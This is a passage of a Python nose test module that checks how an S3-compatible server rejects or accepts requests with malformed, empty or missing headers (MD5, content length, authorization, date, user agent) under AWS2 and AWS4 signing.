import boto.utils
import bunch
import nose
import operator
import random
import string
import socket
import ssl
import os
import re
from urlparse import urlparse
from boto.s3.connection import S3Connection
from nose.tools import eq_ as eq
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
from .utils import assert_raises
import AnonymousAuth
from email.header import decode_header
from . import (
_make_raw_request,
nuke_prefixed_buckets,
get_new_bucket,
s3,
config,
get_prefix,
TargetConnection,
targets,
)
_orig_conn = {}
_orig_authorize = None
_custom_headers = {}
_remove_headers = []
boto_type = None
# HeaderS3Connection and _our_authorize are necessary to be able to arbitrarily
# overwrite headers. Depending on the version of boto, one or the other is
# necessary. We later determine in setup what needs to be used.
def _update_headers(headers):
""" update a set of headers with additions/removals
"""
global _custom_headers, _remove_headers
headers.update(_custom_headers)
for header in _remove_headers:
try:
del headers[header]
except KeyError:
pass
# Note: We need to update the headers twice. The first time so the
# authentication signing is done correctly. The second time to overwrite any
# headers modified or created in the authentication step.
class HeaderS3Connection(S3Connection):
""" establish an authenticated connection w/customized headers
"""
def fill_in_auth(self, http_request, **kwargs):
_update_headers(http_request.headers)
S3Connection.fill_in_auth(self, http_request, **kwargs)
_update_headers(http_request.headers)
return http_request
def _our_authorize(self, connection, **kwargs):
""" perform an authentication w/customized headers
"""
_update_headers(self.headers)
_orig_authorize(self, connection, **kwargs)
_update_headers(self.headers)
def setup():
global boto_type
# we determine what we need to replace by the existence of particular
# attributes. boto 2.0rc1 as fill_in_auth for S3Connection, while boto 2.0
# has authorize for HTTPRequest.
if hasattr(S3Connection, 'fill_in_auth'):
global _orig_conn
boto_type = 'S3Connection'
for conn in s3:
_orig_conn[conn] = s3[conn]
header_conn = HeaderS3Connection(
aws_access_key_id=s3[conn].aws_access_key_id,
aws_secret_access_key=s3[conn].aws_secret_access_key,
is_secure=s3[conn].is_secure,
port=s3[conn].port,
host=s3[conn].host,
calling_format=s3[conn].calling_format
)
s3[conn] = header_conn
elif hasattr(boto.connection.HTTPRequest, 'authorize'):
global _orig_authorize
boto_type = 'HTTPRequest'
_orig_authorize = boto.connection.HTTPRequest.authorize
boto.connection.HTTPRequest.authorize = _our_authorize
else:
raise RuntimeError
def teardown():
global boto_type
# replace original functionality depending on the boto version
if boto_type is 'S3Connection':
global _orig_conn
for conn in s3:
s3[conn] = _orig_conn[conn]
_orig_conn = {}
elif boto_type is 'HTTPRequest':
global _orig_authorize
boto.connection.HTTPRequest.authorize = _orig_authorize
_orig_authorize = None
else:
raise RuntimeError
def _clear_custom_headers():
""" Eliminate any header customizations
"""
global _custom_headers, _remove_headers
_custom_headers = {}
_remove_headers = []
def _add_custom_headers(headers=None, remove=None):
""" Define header customizations (additions, replacements, removals)
"""
global _custom_headers, _remove_headers
if not _custom_headers:
_custom_headers = {}
if headers is not None:
_custom_headers.update(headers)
if remove is not None:
_remove_headers.extend(remove)
def _setup_bad_object(headers=None, remove=None):
""" Create a new bucket, add an object w/header customizations
"""
bucket = get_new_bucket()
_add_custom_headers(headers=headers, remove=remove)
return bucket.new_key('foo')
def tag(*tags):
def wrap(func):
for tag in tags:
setattr(func, tag, True)
return func
return wrap
#
# common tests
#
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_invalid_short():
key = _setup_bad_object({'Content-MD5':'YWJyYWNhZGFicmE='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/mismatched MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_bad():
key = _setup_bad_object({'Content-MD5':'rL0Y20zC+Fzt72VPzMSk2A=='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'BadDigest')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_empty():
key = _setup_bad_object({'Content-MD5': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphics in MD5')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_unreadable():
key = _setup_bad_object({'Content-MD5': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no MD5 header')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_none():
key = _setup_bad_object(remove=('Content-MD5',))
key.set_contents_from_string('bar')
# strangely, amazon doesn't report an error with a non-expect 100 also, our
# error comes back as html, and not xml as I normally expect
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/Expect 200')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_object_create_bad_expect_mismatch():
key = _setup_bad_object({'Expect': 200})
key.set_contents_from_string('bar')
# this is a really long test, and I don't know if it's valid...
# again, accepts this with no troubles
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty expect')
@attr(assertion='succeeds ... should it?')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_expect_empty():
key = _setup_bad_object({'Expect': ''})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no expect')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_expect_none():
key = _setup_bad_object(remove=('Expect',))
key.set_contents_from_string('bar')
# this is a really long test..
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic expect')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_object_create_bad_expect_unreadable():
key = _setup_bad_object({'Expect': '\x07'})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty content length')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_object_create_bad_contentlength_empty():
key = _setup_bad_object({'Content-Length': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, None)
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/negative content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_negative():
key = _setup_bad_object({'Content-Length': -1})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no content length')
@attr(assertion='fails 411')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_none():
key = _setup_bad_object(remove=('Content-Length',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 411)
eq(e.reason, 'Length Required')
eq(e.error_code,'MissingContentLength')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_unreadable():
key = _setup_bad_object({'Content-Length': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, None)
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content length too long')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_object_create_bad_contentlength_mismatch_above():
content = 'bar'
length = len(content) + 1
key = _setup_bad_object({'Content-Length': length})
# Disable retries since key.should_retry will discard the response with
# PleaseRetryException.
def no_retry(response, chunked_transfer): return False
key.should_retry = no_retry
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, content)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'RequestTimeout')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content type text/plain')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contenttype_invalid():
key = _setup_bad_object({'Content-Type': 'text/plain'})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty content type')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contenttype_empty():
key = _setup_bad_object({'Content-Type': ''})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no content type')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contenttype_none():
key = _setup_bad_object(remove=('Content-Type',))
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic content type')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_object_create_bad_contenttype_unreadable():
key = _setup_bad_object({'Content-Type': '\x08'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_object_create_bad_authorization_unreadable():
key = _setup_bad_object({'Authorization': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_empty():
key = _setup_bad_object({'Authorization': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_none():
key = _setup_bad_object(remove=('Authorization',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no content length')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_contentlength_none():
_add_custom_headers(remove=('Content-Length',))
get_new_bucket()
@tag('auth_common')
@attr(resource='bucket')
@attr(method='acls')
@attr(operation='set w/no content length')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_acl_create_contentlength_none():
bucket = get_new_bucket()
key = bucket.new_key('foo')
key.set_contents_from_string('blah')
_add_custom_headers(remove=('Content-Length',))
key.set_acl('public-read')
@tag('auth_common')
@attr(resource='bucket')
@attr(method='acls')
@attr(operation='set w/invalid permission')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_put_bad_canned_acl():
bucket = get_new_bucket()
_add_custom_headers({'x-amz-acl': 'public-ready'})
e = assert_raises(boto.exception.S3ResponseError, bucket.set_acl, 'public-read')
eq(e.status, 400)
# strangely, amazon doesn't report an error with a non-expect 100 also, our
# error comes back as html, and not xml as I normally expect
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/expect 200')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_bucket_create_bad_expect_mismatch():
_add_custom_headers({'Expect':200})
bucket = get_new_bucket()
# this is a really long test, and I don't know if it's valid...
# again, accepts this with no troubles
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/expect empty')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_expect_empty():
_add_custom_headers({'Expect': ''})
bucket = get_new_bucket()
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/expect nongraphic')
@attr(assertion='garbage, but S3 succeeds!')
# this is a really long test..
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_bucket_create_bad_expect_unreadable():
_add_custom_headers({'Expect': '\x07'})
bucket = get_new_bucket()
def _create_new_connection():
# We're going to need to manually build a connection using bad authorization info.
# But to save the day, lets just hijack the settings from s3.main. :)
main = s3.main
conn = HeaderS3Connection(
aws_access_key_id=main.aws_access_key_id,
aws_secret_access_key=main.aws_secret_access_key,
is_secure=main.is_secure,
port=main.port,
host=main.host,
calling_format=main.calling_format,
)
return TargetConnection(targets.main.default.conf, conn)
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty content length')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_bucket_create_bad_contentlength_empty():
conn = _create_new_connection()
_add_custom_headers({'Content-Length': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket, conn)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/negative content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_contentlength_negative():
_add_custom_headers({'Content-Length': -1})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no content length')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_contentlength_none():
_add_custom_headers(remove=('Content-Length',))
bucket = get_new_bucket()
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_contentlength_unreadable():
_add_custom_headers({'Content-Length': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, None)
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_bucket_create_bad_authorization_unreadable():
_add_custom_headers({'Authorization': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_empty():
_add_custom_headers({'Authorization': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_none():
_add_custom_headers(remove=('Authorization',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
#
# AWS2 specific tests
#
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_invalid_garbage_aws2():
check_aws2_support()
key = _setup_bad_object({'Content-MD5':'AWS HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content length too short')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_mismatch_below_aws2():
check_aws2_support()
content = 'bar'
length = len(content) - 1
key = _setup_bad_object({'Content-Length': length})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, content)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'BadDigest')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/incorrect authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_incorrect_aws2():
check_aws2_support()
key = _setup_bad_object({'Authorization': 'AWS AKIAIGR7ZNNBHC5BKSUB:FWeDfwojDSdS2Ztmpfeubhd9isU='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch', 'InvalidAccessKeyId')
@tag('auth_aws2')
@nose.with_setup(teardown=_clear_custom_headers)
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
def test_object_create_bad_authorization_invalid_aws2():
check_aws2_support()
key = _setup_bad_object({'Authorization': 'AWS HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidArgument')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_empty_aws2():
check_aws2_support()
key = _setup_bad_object({'User-Agent': ''})
key.set_contents_from_string('bar')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='succeeds')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_unreadable_aws2():
check_aws2_support()
key = _setup_bad_object({'User-Agent': '\x07'})
key.set_contents_from_string('bar')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_none_aws2():
check_aws2_support()
key = _setup_bad_object(remove=('User-Agent',))
key.set_contents_from_string('bar')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_invalid_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_empty_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_unreadable_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_none_aws2():
check_aws2_support()
key = _setup_bad_object(remove=('Date',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_today_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_today_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_epoch_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date after 9999')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_end_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 9999 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_invalid_aws2():
check_aws2_support()
_add_custom_headers({'Authorization': 'AWS HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidArgument')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_empty_aws2():
check_aws2_support()
_add_custom_headers({'User-Agent': ''})
bucket = get_new_bucket()
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='succeeds')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_unreadable_aws2():
check_aws2_support()
_add_custom_headers({'User-Agent': '\x07'})
bucket = get_new_bucket()
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_none_aws2():
check_aws2_support()
_add_custom_headers(remove=('User-Agent',))
bucket = get_new_bucket()
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_invalid_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_empty_aws2():
check_aws2_support()
_add_custom_headers({'Date': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_unreadable_aws2():
check_aws2_support()
_add_custom_headers({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_none_aws2():
check_aws2_support()
_add_custom_headers(remove=('Date',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_today_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_after_today_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_epoch_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
#
# AWS4 specific tests
#
def check_aws4_support():
if 'S3_USE_SIGV4' not in os.environ:
raise SkipTest
def check_aws2_support():
if 'S3_USE_SIGV4' in os.environ:
raise SkipTest
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_invalid_garbage_aws4():
check_aws4_support()
key = _setup_bad_object({'Content-MD5':'AWS4 HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content length too short')
@attr(assertion='fails 400')
